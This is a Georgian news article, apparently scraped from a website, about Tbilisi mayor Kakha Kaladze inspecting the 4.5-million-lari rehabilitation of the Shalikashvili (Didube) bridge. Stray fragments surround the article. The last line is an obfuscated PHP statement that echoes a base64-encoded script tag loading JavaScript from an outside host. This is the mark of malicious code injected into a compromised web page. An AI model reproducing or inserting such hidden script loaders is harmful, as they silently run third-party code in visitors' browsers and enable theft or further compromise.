celsiusi
ავერსი შნაიდერი

 დედაქალაქის მერი კახა კალაძე შალიკაშვილის სახელობის ხიდის რეაბილიტაციის პროცესის მიმდინარეობას გაეცნო და განხორციელებული სამუშაოები შეაფასა, ამის შესახებ საინფორმაციო სააგენტო "ბიზნესთაიმს" დედაქალაქის მერიიდან აცნობეს.

კახა კალაძის განცხადებით, ხიდზე ავტომობილების თავისუფლად გადაადგილება კვირის ბოლოსთვის თავისუფლად იქნება შესაძლებელი. 
 
„შალიკაშვილის სახელობის, ე.წ. დიდუბის ხიდის სარეაბილიტაციო სამუშაოების ძირითადი ნაწილი დასრულებულია. დაახლოებით კვირის ბოლოს მოძრაობა სრულად აღდგება და გადაადგილება თავისუფლად იქნება შესაძლებელი,  თუმცა სამუშაოები გაგრძელდება. მიმდინარეობს თაღების მოპირკეთების სამუშაოები, ტროტუარების კეთილმოწყობა, გარე განათების ახალი ბოძები დამონტაჟდება, ხიდზე დეკორატიული მინათებები გაკეთდება და სამუშაოების დასრულებას ვფიქრობობთ ოქტომბრის ბოლოსკენ“, - განაცხადა კახა კალაძემ. 
ამ დროისთვის, ტროტუარზე ფილების დაგების სამუშაოები მიმდინარეობს, ხოლო გზის სავალ ნაწილზე ასფალტის საფარის ქვედა ფენების  დაგება დასრულებულია. რეაბილიტაციის ფარგლებში მოეწყობა მოაჯირები, გარე განათების ახალი ქსელი და დეკორატიული მინათებები, ასევე  რეაბილიტირდება მტკვრის თავზე არსებული თაღი. რეაბილიტაციის შედეგად,  ხიდს პირვანდელი სახე შეუნარჩუნდება.  შოთა შალიკაშვილის სახელობის ხიდის რეაბილიტაციის ღირებულება 4,5 მლნ ლარია. სამუშაოებს თბილისის მერიის ინფრასტრუქტურის განვითარების საქალაქო სამსახურის დაკვეთით კომპანია „ავტოგზა ლენტეხი 99“ ახორციელებს.
 
ავტორი
მირანდა შურღაია
1234
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");